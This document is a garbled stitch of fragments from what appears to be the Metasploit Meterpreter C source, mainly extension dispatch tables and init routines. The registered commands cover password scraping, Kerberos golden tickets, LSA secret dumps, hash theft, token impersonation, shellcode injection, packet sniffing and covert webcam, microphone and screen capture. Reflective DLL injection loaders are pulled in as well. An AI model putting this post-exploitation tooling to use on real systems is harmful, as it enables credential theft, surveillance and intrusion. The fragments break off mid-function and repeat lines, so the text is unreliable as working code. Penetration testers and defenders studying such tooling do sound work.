// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#ifdef _WIN32
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#endif
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
// General
extern DWORD request_general_channel_open(Remote *remote, Packet *packet);
Command customCommands[] =
{
// General
COMMAND_REQ("core_channel_open", request_general_channel_open),
#ifdef WIN32
// Railgun
COMMAND_REQ("stdapi_railgun_api", request_railgun_api),
COMMAND_REQ("stdapi_railgun_api_multi", request_railgun_api_multi),
COMMAND_REQ("stdapi_railgun_memread", request_railgun_memread),
COMMAND_REQ("stdapi_railgun_memwrite", request_railgun_memwrite),
#endif
// Fs
COMMAND_REQ("stdapi_fs_ls", request_fs_ls),
COMMAND_REQ("stdapi_fs_getwd", request_fs_getwd),
COMMAND_REQ("stdapi_fs_chdir", request_fs_chdir),
COMMAND_REQ("stdapi_fs_mkdir", request_fs_mkdir),
COMMAND_REQ("stdapi_fs_delete_dir", request_fs_delete_dir),
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "window.h"
#include "service.h"
#include "clipboard.h"
#include "adsi.h"
#include "wmi.h"
#include "ntds.h"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
/*! @brief List of commands that the extended API extension providers. */
Command customCommands[] =
{
COMMAND_REQ("extapi_window_enum", request_window_enum),
COMMAND_REQ("extapi_service_enum", request_service_enum),
COMMAND_REQ("extapi_service_query", request_service_query),
COMMAND_REQ("extapi_service_control", request_service_control),
COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),
COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),
COMMAND_REQ("extapi_clipboard_monitor_start", request_clipboard_monitor_start),
COMMAND_REQ("extapi_clipboard_monitor_pause", request_clipboard_monitor_pause),
COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),
COMMAND_REQ("extapi_clipboard_monitor_purge", request_clipboard_monitor_purge),
COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),
COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),
COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),
COMMAND_REQ("extapi_ntds_parse", ntds_parse),
COMMAND_REQ("extapi_wmi_query", request_wmi_query),
COMMAND_TERMINATOR
#include "main.h"
#include "mimikatz_interface.h"
DWORD request_scrape_passwords(Remote *remote, Packet *packet);
DWORD request_kerberos_golden_ticket_create(Remote *remote, Packet *packet);
DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet);
DWORD request_kerberos_ticket_purge(Remote *remote, Packet *packet);
DWORD request_kerberos_ticket_list(Remote *remote, Packet *packet);
DWORD request_lsa_dump_secrets(Remote *remote, Packet *packet);
DWORD request_wifi_profile_list(Remote *remote, Packet *packet);
/*! @brief The enabled commands for this extension. */
Command customCommands[] =
{
COMMAND_REQ("kiwi_scrape_passwords", request_scrape_passwords),
COMMAND_REQ("kiwi_kerberos_ticket_use", request_kerberos_ticket_use),
COMMAND_REQ("kiwi_kerberos_golden_ticket_create", request_kerberos_golden_ticket_create),
COMMAND_REQ("kiwi_kerberos_ticket_purge", request_kerberos_ticket_purge),
COMMAND_REQ("kiwi_kerberos_ticket_list", request_kerberos_ticket_list),
COMMAND_REQ("kiwi_lsa_dump_secrets", request_lsa_dump_secrets),
COMMAND_REQ("kiwi_wifi_profile_list", request_wifi_profile_list),
COMMAND_TERMINATOR
};
/*!
* @brief Handler for the lsa dump secrets message.
* @param remote Pointer to the \c Remote instance.
* @param packet Pointer to the incoming packet.
* @returns \c ERROR_SUCCESS
*/
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
#include "main.h"
extern __declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPWSTR input);
extern DWORD kuhl_m_kerberos_ptt_data(PVOID data, DWORD dataSize);
extern LONG mimikatz_initOrClean(BOOL Init);
DWORD request_exec_cmd(Remote *remote, Packet *packet);
DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet);
/*! @brief The enabled commands for this extension. */
Command customCommands[] =
{
COMMAND_REQ("kiwi_exec_cmd", request_exec_cmd),
COMMAND_TERMINATOR
};
/*!
* @brief Handler for the generic command execution function.
* @param remote Pointer to the \c Remote instance.
* @param packet Pointer to the incoming packet.
* @returns \c ERROR_SUCCESS
*/
DWORD request_exec_cmd(Remote *remote, Packet *packet)
{
DWORD result = ERROR_SUCCESS;
Packet * response = packet_create_response(packet);
wchar_t* cmd = packet_get_tlv_value_wstring(packet, TLV_TYPE_KIWI_CMD);
extern HINSTANCE hAppInstance;
#endif
PLIST gExtensionList = NULL;
DWORD request_core_enumextcmd(Remote* remote, Packet* packet);
DWORD request_core_machine_id(Remote* remote, Packet* packet);
DWORD request_core_set_uuid(Remote* remote, Packet* packet);
#ifdef _WIN32
BOOL request_core_patch_url(Remote* remote, Packet* packet, DWORD* result);
#endif
// Dispatch table
Command customCommands[] =
{
COMMAND_REQ("core_loadlib", request_core_loadlib),
COMMAND_REQ("core_enumextcmd", request_core_enumextcmd),
COMMAND_REQ("core_machine_id", request_core_machine_id),
COMMAND_REQ("core_set_uuid", request_core_set_uuid),
#ifdef _WIN32
COMMAND_INLINE_REP("core_patch_url", request_core_patch_url),
#endif
COMMAND_TERMINATOR
};
typedef struct _EnumExtensions
{
Packet* pResponse;
char* lpExtensionName;
} EnumExtensions, * PEnumExtensions;
#define _CRT_SECURE_NO_DEPRECATE 1
#include "precomp.h"
DWORD request_sniffer_interfaces(Remote *remote, Packet *packet);
DWORD request_sniffer_capture_start(Remote *remote, Packet *packet);
DWORD request_sniffer_capture_stop(Remote *remote, Packet *packet);
DWORD request_sniffer_capture_stats(Remote *remote, Packet *packet);
DWORD request_sniffer_capture_release(Remote *remote, Packet *packet);
DWORD request_sniffer_capture_dump(Remote *remote, Packet *packet);
DWORD request_sniffer_capture_dump_read(Remote *remote, Packet *packet);
/*! @brief List of custom commands provided by the sniffer extension. */
Command customCommands[] =
{
COMMAND_REQ("sniffer_interfaces", request_sniffer_interfaces),
COMMAND_REQ("sniffer_capture_start", request_sniffer_capture_start),
COMMAND_REQ("sniffer_capture_stop", request_sniffer_capture_stop),
COMMAND_REQ("sniffer_capture_stats", request_sniffer_capture_stats),
COMMAND_REQ("sniffer_capture_release", request_sniffer_capture_release),
COMMAND_REQ("sniffer_capture_dump", request_sniffer_capture_dump),
COMMAND_REQ("sniffer_capture_dump_read", request_sniffer_capture_dump_read),
COMMAND_TERMINATOR
};
#ifdef _WIN32
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#ifdef _WIN32
// see ReflectiveLoader.c...
extern HINSTANCE hAppInstance;
#endif
/**************************
* Core dispatch routines *
**************************/
LIST * extension_list = NULL;
// Dispatch table
Command customCommands[] =
{
COMMAND_REQ( "core_loadlib", request_core_loadlib ),
COMMAND_TERMINATOR
};
/*
* Registers custom command handlers
*/
VOID register_dispatch_routines()
{
extension_list = list_create();
command_register_all( customCommands );
}
/*
* Deregisters previously registered custom commands and loaded extensions.
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
Command customCommands[] =
{
COMMAND_REQ( "espia_video_get_dev_image", request_video_get_dev_image ),
COMMAND_REQ( "espia_audio_get_dev_audio", request_audio_get_dev_audio ),
COMMAND_REQ( "espia_image_get_dev_screen", request_image_get_dev_screen ),
COMMAND_TERMINATOR
};
/*
* Initialize the server extension
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
hMetSrv = remote->hMetSrv;
command_register_all( customCommands );
return ERROR_SUCCESS;
return ERROR_SUCCESS;
}
//Turns off the TFTP server
DWORD request_lanattacks_stop_tftp(Remote *remote, Packet *packet){
Packet *response = packet_create_response(packet);
int res = stopTFTPServer(tftpserver);
packet_transmit_response(res, remote, response);
return ERROR_SUCCESS;
}
Command customCommands[] =
{
COMMAND_REQ( "lanattacks_start_dhcp", request_lanattacks_start_dhcp ),
COMMAND_REQ( "lanattacks_reset_dhcp", request_lanattacks_reset_dhcp ),
COMMAND_REQ( "lanattacks_set_dhcp_option", request_lanattacks_set_dhcp_option ),
COMMAND_REQ( "lanattacks_stop_dhcp", request_lanattacks_stop_dhcp ),
COMMAND_REQ( "lanattacks_dhcp_log", request_lanattacks_dhcp_log ),
COMMAND_REQ( "lanattacks_start_tftp", request_lanattacks_start_tftp ),
COMMAND_REQ( "lanattacks_reset_tftp", request_lanattacks_stop_tftp ),
COMMAND_REQ( "lanattacks_add_tftp_file", request_lanattacks_add_tftp_file ),
COMMAND_REQ( "lanattacks_stop_tftp", request_lanattacks_stop_tftp ),
COMMAND_TERMINATOR
};
/*
* Initialize the server extension
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote) {
*/
Command commands[] =
{
/*
* Core commands
*/
// Console commands
{ "core_console_write",
{ remote_request_core_console_write, { TLV_META_TYPE_STRING }, 1 | ARGUMENT_FLAG_REPEAT },
{ remote_response_core_console_write, EMPTY_TLV },
},
// Native Channel commands
COMMAND_REQ_REP( "core_channel_open", remote_request_core_channel_open, remote_response_core_channel_open ),
COMMAND_REQ( "core_channel_write", remote_request_core_channel_write ),
COMMAND_REQ_REP( "core_channel_close", remote_request_core_channel_close, remote_response_core_channel_close ),
// Buffered/Pool channel commands
COMMAND_REQ( "core_channel_read", remote_request_core_channel_read ),
// Pool channel commands
COMMAND_REQ( "core_channel_seek", remote_request_core_channel_seek ),
COMMAND_REQ( "core_channel_eof", remote_request_core_channel_eof ),
COMMAND_REQ( "core_channel_tell", remote_request_core_channel_tell ),
// Soon to be deprecated
COMMAND_REQ( "core_channel_interact", remote_request_core_channel_interact ),
// Crypto
COMMAND_REQ( "core_crypto_negotiate", remote_request_core_crypto_negotiate ),
// Migration
COMMAND_REQ( "core_migrate", remote_request_core_migrate ),
// Shutdown
COMMAND_REQ( "core_shutdown", remote_request_core_shutdown ),
* @brief Entry point and intialisation definitions for the Peinjector extension
*/
#include "../../common/common.h"
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h"
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "peinjector_bridge.h"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
Command customCommands[] =
{
COMMAND_REQ("peinjector_inject_shellcode", request_peinjector_inject_shellcode),
COMMAND_TERMINATOR
};
/*!
* @brief Initialize the server extension
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
hMetSrv = remote->met_srv;
dprintf("[PEINJECTOR] Initializing peinjector...");
command_register_all(customCommands);
return ERROR_SUCCESS;
}
cleanup:
for (i=0;i<num_tokens;i++)
CloseHandle(token_list[i].token);
free(token_list);
free(uniq_tokens);
packet_add_tlv_string(response, TLV_TYPE_INCOGNITO_GENERIC_RESPONSE, return_value);
packet_transmit_response(ERROR_SUCCESS, remote, response);
return ERROR_SUCCESS;
}
Command customCommands[] =
{
COMMAND_REQ( "incognito_list_tokens", request_incognito_list_tokens ),
COMMAND_REQ( "incognito_impersonate_token", request_incognito_impersonate_token ),
COMMAND_REQ( "incognito_add_user", request_incognito_add_user ),
COMMAND_REQ( "incognito_add_group_user", request_incognito_add_group_user ),
COMMAND_REQ( "incognito_add_localgroup_user", request_incognito_add_localgroup_user ),
COMMAND_REQ( "incognito_snarf_hashes", request_incognito_snarf_hashes ),
COMMAND_TERMINATOR
};
/*
* Initialize the server extension
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
hMetSrv = remote->hMetSrv;
initialize_mimikatz();
myMimiKatz->doCommandeLocale(&function, &args);
wchar_t* output = convert_wstring_to_wchar_t(oss.str());
clear_buffer();
packet_add_tlv_raw(response, TLV_TYPE_MIMIKATZ_RESULT, output, (DWORD)(wcslen(output)*sizeof(wchar_t)));
packet_transmit_response(ERROR_SUCCESS, remote, response);
return ERROR_SUCCESS;
}
Command customCommands[] =
{
COMMAND_REQ( "mimikatz_custom_command", request_custom_command ),
COMMAND_TERMINATOR
};
/*!
* @brief Initialize the server extension.
* @param remote Pointer to the remote instance.
* @return Indication of success or failure.
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
hMetSrv = remote->met_srv;
command_register_all( customCommands );
return ERROR_SUCCESS;
